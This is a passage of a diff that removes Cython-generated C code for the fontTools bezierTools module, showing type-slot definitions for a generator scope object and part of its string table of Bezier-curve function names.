CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_x); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_x) { - e = (*v)(p->__pyx_v_x, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_6_genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_6_genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static PyMethodDef __pyx_methods[] = { - {0, 0, 0, 0} -}; -#ifndef CYTHON_SMALL_CODE -#if defined(__clang__) - #define CYTHON_SMALL_CODE -#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) - #define CYTHON_SMALL_CODE __attribute__((cold)) -#else - #define CYTHON_SMALL_CODE -#endif -#endif -/* #### Code section: pystring_table ### */ - -static int __Pyx_CreateStringTabAndInitStrings(void) { - __Pyx_StringTabEntry __pyx_string_tab[] = { - {&__pyx_n_s_1_t, __pyx_k_1_t, sizeof(__pyx_k_1_t), 0, 0, 1, 1}, - {&__pyx_n_s_1_t_2, __pyx_k_1_t_2, sizeof(__pyx_k_1_t_2), 0, 0, 1, 1}, - {&__pyx_n_s_2_t_1_t, __pyx_k_2_t_1_t, sizeof(__pyx_k_2_t_1_t), 0, 0, 1, 1}, - {&__pyx_kp_u_Approximates_the_arc_length_for, __pyx_k_Approximates_the_arc_length_for, sizeof(__pyx_k_Approximates_the_arc_length_for), 0, 1, 0, 0}, - {&__pyx_n_s_AttributeError, __pyx_k_AttributeError, sizeof(__pyx_k_AttributeError), 0, 0, 1, 1}, - {&__pyx_n_s_COMPILED, __pyx_k_COMPILED, sizeof(__pyx_k_COMPILED), 0, 0, 1, 1}, - {&__pyx_kp_u_Calculates_the_arc_length_for_a, __pyx_k_Calculates_the_arc_length_for_a, sizeof(__pyx_k_Calculates_the_arc_length_for_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Calculates_the_bounding_rectangl, __pyx_k_Calculates_the_bounding_rectangl, sizeof(__pyx_k_Calculates_the_bounding_rectangl), 0, 1, 0, 0}, - {&__pyx_kp_u_Calculates_the_bounding_rectangl_2, __pyx_k_Calculates_the_bounding_rectangl_2, sizeof(__pyx_k_Calculates_the_bounding_rectangl_2), 0, 1, 0, 0}, - {&__pyx_kp_u_Couldn_t_work_out_which_intersec, __pyx_k_Couldn_t_work_out_which_intersec, sizeof(__pyx_k_Couldn_t_work_out_which_intersec), 0, 1, 0, 0}, - {&__pyx_n_s_DD, __pyx_k_DD, sizeof(__pyx_k_DD), 0, 0, 1, 1}, - {&__pyx_kp_u_Finds_intersections_between_a_cu, __pyx_k_Finds_intersections_between_a_cu, sizeof(__pyx_k_Finds_intersections_between_a_cu), 0, 1, 0, 0}, - {&__pyx_kp_u_Finds_intersections_between_a_cu_2, __pyx_k_Finds_intersections_between_a_cu_2, sizeof(__pyx_k_Finds_intersections_between_a_cu_2), 0, 1, 0, 0}, - {&__pyx_kp_u_Finds_intersections_between_two, __pyx_k_Finds_intersections_between_two, sizeof(__pyx_k_Finds_intersections_between_two), 0, 1, 0, 0}, - {&__pyx_kp_u_Finds_intersections_between_two_2, __pyx_k_Finds_intersections_between_two_2, sizeof(__pyx_k_Finds_intersections_between_two_2), 0, 1, 0, 0}, - {&__pyx_n_s_Identity, __pyx_k_Identity, sizeof(__pyx_k_Identity), 0, 0, 1, 1}, - {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, - {&__pyx_n_s_Intersection, __pyx_k_Intersection, sizeof(__pyx_k_Intersection), 0, 0, 1, 1}, - {&__pyx_n_u_Intersection, __pyx_k_Intersection, sizeof(__pyx_k_Intersection), 0, 1, 0, 1}, - {&__pyx_n_s_Len, __pyx_k_Len, sizeof(__pyx_k_Len), 0, 0, 1, 1}, - {&__pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_k_Lib_fontTools_misc_bezierTools_p, sizeof(__pyx_k_Lib_fontTools_misc_bezierTools_p), 0, 0, 1, 0}, - {&__pyx_n_s_Q, __pyx_k_Q, sizeof(__pyx_k_Q), 0, 0, 1, 1}, - {&__pyx_n_s_Q3, __pyx_k_Q3, sizeof(__pyx_k_Q3), 0, 0, 1, 1}, - {&__pyx_n_s_R, __pyx_k_R, sizeof(__pyx_k_R), 0, 0, 1, 1}, - {&__pyx_n_s_R2, __pyx_k_R2, sizeof(__pyx_k_R2), 0, 0, 1, 1}, - {&__pyx_n_s_R2_Q3, __pyx_k_R2_Q3, sizeof(__pyx_k_R2_Q3), 0, 0, 1, 1}, - {&__pyx_kp_u_Solve_a_cubic_equation_Solves_a, __pyx_k_Solve_a_cubic_equation_Solves_a, sizeof(__pyx_k_Solve_a_cubic_equation_Solves_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a, __pyx_k_Split_a_cubic_Bezier_curve_at_a, sizeof(__pyx_k_Split_a_cubic_Bezier_curve_at_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on, __pyx_k_Split_a_cubic_Bezier_curve_at_on, sizeof(__pyx_k_Split_a_cubic_Bezier_curve_at_on), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_line_at_a_given_coordina, __pyx_k_Split_a_line_at_a_given_coordina, sizeof(__pyx_k_Split_a_line_at_a_given_coordina), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_quadratic_Bezier_curve_a, __pyx_k_Split_a_quadratic_Bezier_curve_a, sizeof(__pyx_k_Split_a_quadratic_Bezier_curve_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2, __pyx_k_Split_a_quadratic_Bezier_curve_a_2, sizeof(__pyx_k_Split_a_quadratic_Bezier_curve_a_2), 0, 1, 0, 0}, - {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, - {&__pyx_kp_u_Unknown_curve_degree, __pyx_k_Unknown_curve_degree, sizeof(__pyx_k_Unknown_curve_degree), 0, 1, 0, 0}, - {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, - {&__pyx_kp_u__10, __pyx_k__10, sizeof(__pyx_k__10), 0, 1, 0, 0}, - {&__pyx_n_s__103, __pyx_k__103, sizeof(__pyx_k__103), 0, 0, 1, 1}, - {&__pyx_n_s__11, __pyx_k__11, sizeof(__pyx_k__11), 0, 0, 1, 1}, - {&__pyx_kp_u__9, __pyx_k__9, sizeof(__pyx_k__9), 0, 1, 0, 0}, - {&__pyx_n_s__91, __pyx_k__91, sizeof(__pyx_k__91), 0, 0, 1, 1}, - {&__pyx_n_s_a, __pyx_k_a, sizeof(__pyx_k_a), 0, 0, 1, 1}, - {&__pyx_n_s_a1, __pyx_k_a1, sizeof(__pyx_k_a1), 0, 0, 1, 1}, - {&__pyx_n_s_a1_3, __pyx_k_a1_3, sizeof(__pyx_k_a1_3), 0, 0, 1, 1}, - {&__pyx_n_s_a1x, __pyx_k_a1x, sizeof(__pyx_k_a1x), 0, 0, 1, 1}, - {&__pyx_n_s_a1y, __pyx_k_a1y, sizeof(__pyx_k_a1y), 0, 0, 1, 1}, - {&__pyx_n_s_a2, __pyx_k_a2, sizeof(__pyx_k_a2), 0, 0, 1, 1}, - {&__pyx_n_s_a3, __pyx_k_a3, sizeof(__pyx_k_a3), 0, 0, 1, 1}, - {&__pyx_n_s_acos, __pyx_k_acos, sizeof(__pyx_k_acos), 0, 0, 1, 1}, - {&__pyx_n_s_aligned_curve, __pyx_k_aligned_curve, sizeof(__pyx_k_aligned_curve), 0, 0, 1, 1}, - {&__pyx_n_s_alignment_transformation, __pyx_k_alignment_transformation, sizeof(__pyx_k_alignment_transformation), 0, 0, 1, 1}, - {&__pyx_n_s_all, __pyx_k_all, sizeof(__pyx_k_all), 0, 0, 1, 1}, - {&__pyx_n_s_angle, __pyx_k_angle, sizeof(__pyx_k_angle), 0, 0, 1, 1}, - {&__pyx_n_s_append, __pyx_k_append, sizeof(__pyx_k_append), 0, 0, 1, 1}, - {&__pyx_n_s_approximateCubicArcLength, __pyx_k_approximateCubicArcLength, sizeof(__pyx_k_approximateCubicArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_approximateCubicArcLength, __pyx_k_approximateCubicArcLength, sizeof(__pyx_k_approximateCubicArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_approximateCubicArcLengthC, __pyx_k_approximateCubicArcLengthC, sizeof(__pyx_k_approximateCubicArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_approximateCubicArcLengthC, __pyx_k_approximateCubicArcLengthC, sizeof(__pyx_k_approximateCubicArcLengthC), 0, 1, 0, 1}, - {&__pyx_kp_u_approximateCubicArcLength_line_3, __pyx_k_approximateCubicArcLength_line_3, sizeof(__pyx_k_approximateCubicArcLength_line_3), 0, 1, 0, 0}, - {&__pyx_n_s_approximateQuadraticArcLength, __pyx_k_approximateQuadraticArcLength, sizeof(__pyx_k_approximateQuadraticArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_approximateQuadraticArcLength, __pyx_k_approximateQuadraticArcLength, sizeof(__pyx_k_approximateQuadraticArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_approximateQuadraticArcLengthC, __pyx_k_approximateQuadraticArcLengthC, sizeof(__pyx_k_approximateQuadraticArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_approximateQuadraticArcLengthC, __pyx_k_approximateQuadraticArcLengthC, sizeof(__pyx_k_approximateQuadraticArcLengthC), 0, 1, 0, 1}, - {&__pyx_n_s_arch, __pyx_k_arch, sizeof(__pyx_k_arch), 0, 0, 1, 1}, - {&__pyx_n_s_args, __pyx_k_args, sizeof(__pyx_k_args), 0, 0, 1, 1}, - {&__pyx_n_s_asinh, __pyx_k_asinh, sizeof(__pyx_k_asinh), 0, 0, 1, 1}, - {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, - {&__pyx_n_s_atan2, __pyx_k_atan2, sizeof(__pyx_k_atan2), 0, 0, 1, 1}, - {&__pyx_n_s_ax, __pyx_k_ax, sizeof(__pyx_k_ax), 0, 0, 1, 1}, - {&__pyx_n_s_ax2, __pyx_k_ax2, sizeof(__pyx_k_ax2), 0, 0, 1, 1}, - {&__pyx_n_s_ax3, __pyx_k_ax3, sizeof(__pyx_k_ax3), 0, 0, 1, 1}, - {&__pyx_n_s_ay, __pyx_k_ay, sizeof(__pyx_k_ay), 0, 0, 1, 1}, - {&__pyx_n_s_ay2, __pyx_k_ay2, sizeof(__pyx_k_ay2), 0, 0, 1, 1}, - {&__pyx_n_s_ay3, __pyx_k_ay3, sizeof(__pyx_k_ay3), 0, 0, 1, 1}, - {&__pyx_n_s_b, __pyx_k_b, sizeof(__pyx_k_b), 0, 0, 1, 1}, - {&__pyx_n_s_b1, __pyx_k_b1, sizeof(__pyx_k_b1), 0, 0, 1, 1}, - {&__pyx_n_s_b1x, __pyx_k_b1x, sizeof(__pyx_k_b1x), 0, 0, 1, 1}, - {&__pyx_n_s_b1y, __pyx_k_b1y, sizeof(__pyx_k_b1y), 0, 0, 1, 1}, - {&__pyx_n_s_both_points_are_on_same_side_of, __pyx_k_both_points_are_on_same_side_of, sizeof(__pyx_k_both_points_are_on_same_side_of), 0, 0, 1, 1}, - {&__pyx_n_s_bounds1, __pyx_k_bounds1, sizeof(__pyx_k_bounds1), 0, 0, 1, 1}, - {&__pyx_n_s_bounds2, __pyx_k_bounds2, sizeof(__pyx_k_bounds2), 0, 0, 1, 1}, - {&__pyx_n_s_box, __pyx_k_box, sizeof(__pyx_k_box), 0, 0, 1, 1}, - {&__pyx_n_s_bx, __pyx_k_bx, sizeof(__pyx_k_bx), 0, 0, 1, 1}, - {&__pyx_n_s_bx2, __pyx_k_bx2, sizeof(__pyx_k_bx2), 0, 0, 1, 1}, - {&__pyx_n_s_by, __pyx_k_by, sizeof(__pyx_k_by), 0, 0, 1, 1}, - {&__pyx_n_s_by2, __pyx_k_by2, sizeof(__pyx_k_by2), 0, 0, 1, 1}, - {&__pyx_n_s_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 0, 1, 1}, - {&__pyx_n_s_c1, __pyx_k_c1, sizeof(__pyx_k_c1), 0, 0, 1, 1}, - {&__pyx_n_s_c11, __pyx_k_c11, sizeof(__pyx_k_c11), 0, 0, 1, 1}, - {&__pyx_n_s_c11_range, __pyx_k_c11_range, sizeof(__pyx_k_c11_range), 0, 0, 1, 1}, - {&__pyx_n_s_c12, __pyx_k_c12, sizeof(__pyx_k_c12), 0, 0, 1, 1}, - {&__pyx_n_s_c12_range, __pyx_k_c12_range, sizeof(__pyx_k_c12_range), 0, 0, 1, 1}, - {&__pyx_n_s_c1x, __pyx_k_c1x, sizeof(__pyx_k_c1x), 0, 0, 1, 1}, - {&__pyx_n_s_c1y, __pyx_k_c1y, sizeof(__pyx_k_c1y), 0, 0, 1, 1}, - {&__pyx_n_s_c21, __pyx_k_c21, sizeof(__pyx_k_c21), 0, 0, 1, 1}, - {&__pyx_n_s_c21_range, __pyx_k_c21_range, sizeof(__pyx_k_c21_range), 0, 0, 1, 1}, - {&__pyx_n_s_c22, __pyx_k_c22, sizeof(__pyx_k_c22), 0, 0, 1, 1}, - {&__pyx_n_s_c22_range, __pyx_k_c22_range, sizeof(__pyx_k_c22_range), 0, 0, 1, 1}, - {&__pyx_n_s_calcBounds, __pyx_k_calcBounds, sizeof(__pyx_k_calcBounds), 0, 0, 1, 1}, - {&__pyx_n_s_calcCubicArcLength, __pyx_k_calcCubicArcLength, sizeof(__pyx_k_calcCubicArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_calcCubicArcLength, __pyx_k_calcCubicArcLength, sizeof(__pyx_k_calcCubicArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_calcCubicArcLengthC, __pyx_k_calcCubicArcLengthC, sizeof(__pyx_k_calcCubicArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_calcCubicArcLengthC, __pyx_k_calcCubicArcLengthC, sizeof(__pyx_k_calcCubicArcLengthC), 0, 1, 0, 1}, - {&__pyx_n_s_calcCubicArcLengthCRecurse, __pyx_k_calcCubicArcLengthCRecurse, sizeof(__pyx_k_calcCubicArcLengthCRecurse), 0, 0, 1, 1}, - {&__pyx_n_s_calcCubicBounds, __pyx_k_calcCubicBounds, sizeof(__pyx_k_calcCubicBounds), 0, 0, 1, 1}, - {&__pyx_n_u_calcCubicBounds, __pyx_k_calcCubicBounds, sizeof(__pyx_k_calcCubicBounds), 0, 1, 0, 1}, - {&__pyx_kp_u_calcCubicBounds_line_412, __pyx_k_calcCubicBounds_line_412, sizeof(__pyx_k_calcCubicBounds_line_412), 0, 1, 0, 0}, - {&__pyx_n_s_calcCubicParameters, __pyx_k_calcCubicParameters, sizeof(__pyx_k_calcCubicParameters), 0, 0, 1, 1}, - {&__pyx_n_s_calcCubicPoints, __pyx_k_calcCubicPoints, sizeof(__pyx_k_calcCubicPoints), 0, 0, 1, 1}, - {&__pyx_n_s_calcQuadraticArcLength, __pyx_k_calcQuadraticArcLength, sizeof(__pyx_k_calcQuadraticArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_calcQuadraticArcLength, __pyx_k_calcQuadraticArcLength, sizeof(__pyx_k_calcQuadraticArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_calcQuadraticArcLengthC, __pyx_k_calcQuadraticArcLengthC, sizeof(__pyx_k_calcQuadraticArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_calcQuadraticArcLengthC, __pyx_k_calcQuadraticArcLengthC, sizeof(__pyx_k_calcQuadraticArcLengthC), 0, 1, 0, 1}, - {&__pyx_kp_u_calcQuadraticArcLength_line_151, __pyx_k_calcQuadraticArcLength_line_151, sizeof(__pyx_k_calcQuadraticArcLength_line_151), 0, 1, 0, 0}, - {&__pyx_n_s_calcQuadraticBounds, __pyx_k_calcQuadraticBounds, sizeof(__pyx_k_calcQuadraticBounds), 0, 0, 1, 1}, - {&__pyx_n_u_calcQuadraticBounds, __pyx_k_calcQuadraticBounds, sizeof(__pyx_k_calcQuadraticBounds), 0, 1, 0, 1}, - {&__pyx_kp_u_calcQuadraticBounds_line_298, __pyx_k_calcQuadraticBounds_line_298, sizeof(__pyx_k_calcQuadraticBounds_line_298), 0, 1, 0, 0}, - {&__pyx_n_s_calcQuadraticParameters, __pyx_k_calcQuadraticParameters, sizeof(__pyx_k_calcQuadraticParameters), 0, 0, 1, 1}, - {&__pyx_n_s_calcQuadraticPoints, __pyx_k_calcQuadraticPoints, sizeof(__pyx_k_calcQuadraticPoints), 0, 0, 1, 1}, - {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, - {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, - {&__pyx_n_s_close, __pyx_k_close, sizeof(__pyx_k_close), 0, 0, 1, 1}, - {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, - {&__pyx_n_s_cos, __pyx_k_cos, sizeof(__pyx_k_cos), 0, 0, 1, 1}, - {&__pyx_n_s_cubicPointAtT, __pyx_k_cubicPointAtT, sizeof(__pyx_k_cubicPointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_cubicPointAtT, __pyx_k_cubicPointAtT, sizeof(__pyx_k_cubicPointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_cubicPointAtTC, __pyx_k_cubicPointAtTC, sizeof(__pyx_k_cubicPointAtTC), 0, 0, 1, 1}, - {&__pyx_n_u_cubicPointAtTC, __pyx_k_cubicPointAtTC, sizeof(__pyx_k_cubicPointAtTC), 0, 1, 0, 1}, - {&__pyx_n_s_curve, __pyx_k_curve, sizeof(__pyx_k_curve), 0, 0, 1, 1}, - {&__pyx_n_s_curve1, __pyx_k_curve1, sizeof(__pyx_k_curve1), 0, 0, 1, 1}, - {&__pyx_n_s_curve2, __pyx_k_curve2, sizeof(__pyx_k_curve2), 0, 0, 1, 1}, - {&__pyx_n_s_curveCurveIntersections, __pyx_k_curveCurveIntersections, sizeof(__pyx_k_curveCurveIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_curveCurveIntersections, __pyx_k_curveCurveIntersections, sizeof(__pyx_k_curveCurveIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_curveCurveIntersections_line_137, __pyx_k_curveCurveIntersections_line_137, sizeof(__pyx_k_curveCurveIntersections_line_137), 0, 1, 0, 0}, - {&__pyx_n_s_curveLineIntersections, __pyx_k_curveLineIntersections, sizeof(__pyx_k_curveLineIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_curveLineIntersections, __pyx_k_curveLineIntersections, sizeof(__pyx_k_curveLineIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_curveLineIntersections_line_1248, __pyx_k_curveLineIntersections_line_1248, sizeof(__pyx_k_curveLineIntersections_line_1248), 0, 1, 0, 0}, - {&__pyx_n_s_curve_bounds, __pyx_k_curve_bounds, sizeof(__pyx_k_curve_bounds), 0, 0, 1, 1}, - {&__pyx_n_s_curve_curve_intersections_t, __pyx_k_curve_curve_intersections_t, sizeof(__pyx_k_curve_curve_intersections_t), 0, 0, 1, 1}, - {&__pyx_n_s_curve_curve_intersections_t_loc, __pyx_k_curve_curve_intersections_t_loc, sizeof(__pyx_k_curve_curve_intersections_t_loc), 0, 0, 1, 1}, - {&__pyx_n_s_curve_curve_intersections_t_loc_2, __pyx_k_curve_curve_intersections_t_loc_2, sizeof(__pyx_k_curve_curve_intersections_t_loc_2), 0, 0, 1, 1}, - {&__pyx_n_s_curve_line_intersections_t, __pyx_k_curve_line_intersections_t, sizeof(__pyx_k_curve_line_intersections_t), 0, 0, 1, 1}, - {&__pyx_n_s_curve_line_intersections_t_loca, __pyx_k_curve_line_intersections_t_loca, sizeof(__pyx_k_curve_line_intersections_t_loca), 0, 0, 1, 1}, - {&__pyx_n_s_cx, __pyx_k_cx, sizeof(__pyx_k_cx), 0, 0, 1, 1}, - {&__pyx_n_s_cy, __pyx_k_cy, sizeof(__pyx_k_cy), 0, 0, 1, 1}, - {&__pyx_n_s_cython, __pyx_k_cython, sizeof(__pyx_k_cython), 0, 0, 1, 1}, - {&__pyx_n_s_d, __pyx_k_d, sizeof(__pyx_k_d), 0, 0, 1, 1}, - {&__pyx_n_s_d0, __pyx_k_d0, sizeof(__pyx_k_d0), 0, 0, 1, 1}, - {&__pyx_n_s_d1, __pyx_k_d1, sizeof(__pyx_k_d1), 0, 0, 1, 1}, - {&__pyx_n_s_d1x, __pyx_k_d1x, sizeof(__pyx_k_d1x), 0, 0, 1, 1}, - {&__pyx_n_s_d1y, __pyx_k_d1y, sizeof(__pyx_k_d1y), 0, 0, 1, 1}, - {&__pyx_n_s_delta, __pyx_k_delta, sizeof(__pyx_k_delta), 0, 0, 1, 1}, - {&__pyx_n_s_delta_2, __pyx_k_delta_2, sizeof(__pyx_k_delta_2), 0, 0, 1, 1}, - {&__pyx_n_s_delta_3, __pyx_k_delta_3, sizeof(__pyx_k_delta_3), 0, 0, 1, 1}, - {&__pyx_n_s_deriv3, __pyx_k_deriv3, sizeof(__pyx_k_deriv3), 0, 0, 1, 1}, - {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, - {&__pyx_n_s_doctest, __pyx_k_doctest, sizeof(__pyx_k_doctest), 0, 0, 1, 1}, - {&__pyx_n_s_dx, __pyx_k_dx, sizeof(__pyx_k_dx), 0, 0, 1, 1}, - {&__pyx_n_s_dy, __pyx_k_dy, sizeof(__pyx_k_dy), 0, 0, 1, 1}, - {&__pyx_n_s_e, __pyx_k_e, sizeof(__pyx_k_e), 0, 0, 1, 1}, - {&__pyx_n_s_e1, __pyx_k_e1, sizeof(__pyx_k_e1), 0, 0, 1, 1}, - {&__pyx_n_s_e1x, __pyx_k_e1x, sizeof(__pyx_k_e1x), 0, 0, 1, 1}, - {&__pyx_n_s_e1y, __pyx_k_e1y, sizeof(__pyx_k_e1y), 0, 0, 1, 1}, - {&__pyx_n_s_e2, __pyx_k_e2, sizeof(__pyx_k_e2), 0, 0, 1, 1}, - {&__pyx_n_s_e2x, __pyx_k_e2x, sizeof(__pyx_k_e2x), 0, 0, 1, 1}, - {&__pyx_n_s_e2y, __pyx_k_e2y, sizeof(__pyx_k_e2y), 0, 0, 1, 1}, - {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, - {&__pyx_n_s_end, __pyx_k_end, sizeof(__pyx_k_end), 0, 0, 1, 1}, - {&__pyx_n_s_epsilon, __pyx_k_epsilon, sizeof(__pyx_k_epsilon), 0, 0, 1, 1}, - {&__pyx_n_s_epsilonDigits, __pyx_k_epsilonDigits, sizeof(__pyx_k_epsilonDigits), 0, 0, 1, 1}, - {&__pyx_n_s_ex, __pyx_k_ex, sizeof(__pyx_k_ex), 0, 0, 1, 1}, - {&__pyx_n_s_exit, __pyx_k_exit, sizeof(__pyx_k_exit), 0, 0, 1, 1}, - {&__pyx_n_s_ey, __pyx_k_ey, sizeof(__pyx_k_ey), 0, 0, 1, 1}, - {&__pyx_n_s_failed, __pyx_k_failed, sizeof(__pyx_k_failed), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc, __pyx_k_fontTools_misc, 